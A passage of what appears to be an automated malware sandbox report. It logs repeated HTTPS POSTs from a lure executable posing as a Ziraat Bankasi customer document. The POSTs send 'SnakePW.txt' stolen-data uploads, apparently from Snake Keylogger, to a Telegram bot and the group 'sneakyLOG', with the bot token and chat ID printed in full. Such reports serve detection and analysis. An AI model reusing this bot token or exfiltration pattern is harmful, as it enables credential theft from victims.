                                      Date: Thu, 26 Sep 2024 09:02:29 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:29 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 34 39 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35883,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341349,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      140192.168.2.449889149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:30 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd209f198ce1ba
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:30 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 39 66 31 39 38 63 65 31 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd209f198ce1baContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:30 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:30 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:30 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 35 30 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35884,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341350,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      141192.168.2.449890149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:31 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd20f886ea4178
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:31 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 66 38 38 36 65 61 34 31 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd20f886ea4178Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:31 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:31 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:31 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 35 31 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35885,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341351,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      142192.168.2.449891149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:32 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd2149b2ae10d0
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:02:32 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 34 39 62 32 61 65 31 30 64 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd2149b2ae10d0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:32 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:32 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:32 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 35 32 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35886,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341352,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      143192.168.2.449892149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:33 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd219aca851858
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:33 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 39 61 63 61 38 35 31 38 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd219aca851858Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:33 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:33 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:33 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 35 33 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35887,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341353,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      144192.168.2.449893149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:34 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd21ea63fb68b5
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:02:34 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 65 61 36 33 66 62 36 38 62 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd21ea63fb68b5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:37 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:37 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:37 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 35 37 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35888,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341357,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      145192.168.2.449894149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:38 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd233ff480d1da
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:02:38 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 33 66 66 34 38 30 64 31 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd233ff480d1daContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:38 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:38 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:02:38 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 33 35 38 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35889,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341358,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      146192.168.2.449895149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:02:39 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd255075071724
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:02:39 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 35 30 37 35 30 37 31 37 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd255075071724Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:02:39 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:02:39 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
